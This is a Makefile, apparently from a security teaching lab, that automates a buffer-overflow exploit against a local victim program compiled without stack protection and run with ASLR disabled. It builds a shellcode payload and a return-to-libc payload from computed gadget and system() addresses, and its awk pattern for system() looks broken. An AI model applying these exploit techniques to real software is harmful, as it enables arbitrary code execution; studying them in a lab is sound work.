# This is an attempt to automate the construction of an attack against # the victim program that executes a shellcode to open /bin/sh. # # The scripts try to obtain all parameters but you need to set the # memory location of the buffer on the stack below (printed to the # stderr by the victim for convenience). # # If the 'make attack' target succeeds, you end in an non-interactive # shell; try typing shell commands to see that you actually are in a # shell. # # The second attack uses a return to libc approach, it does not # require an executable stack but it requires to know the address of # 'gadgets' in the libc. BUFFER = 0x7fffffffe3c0 BUFFER = 0x7fffffffe2d0 LIBC_BASE = 0x7ffff7e21000 LIBC_BASE = 0x7ffff7df8000 # start of the first libc memory segment LIBC = /lib/x86_64-linux-gnu/libc.so.6 GADGET_OFF = 0x$(shell xxd -c1 -p $(LIBC) | grep -n -B1 c3 | grep 5f -m1 | awk '{printf "%x\n",$$1-1}') #GADGET_OFF = 0x0003b8a0 SYSTEM_OFF = 0x$(shell nm -D $(LIBC) | awk '/\/{print $$1}') GADGET = 0x$(shell printf "%016x" $$(($(LIBC_BASE) + $(GADGET_OFF)))) SYSTEM = 0x$(shell printf "%016x" $$(($(LIBC_BASE) + $(SYSTEM_OFF)))) all: info victim attack.bin info: @printf "%s\t\t%#x\n" buffer: $(BUFFER) @printf "%s\t%#x\n" gadget-offset: $(GADGET_OFF) @printf "%s\t%#x\n" system-offet: $(SYSTEM_OFF) @printf "%s\t%#x\n" libc-base: $(LIBC_BASE) @printf "%s\t\t%#x\n" gadget: $(GADGET) @printf "%s\t\t%#x\n" system: $(SYSTEM) victim: victim.c gcc -fno-stack-protector -o victim victim.c attack.bin: Makefile (echo -n /bin/sh | xxd -p; printf %0130d 0; \ printf %016x $(GADGET) | tac -rs..; \ printf %016x $(BUFFER) | tac -rs..; \ printf %016x $(SYSTEM) | tac -rs..) | \ xxd -r -p > attack.bin attack: victim attack.bin cat attack.bin - | setarch $$(arch) -R ./victim clean: rm -f victim attack.bin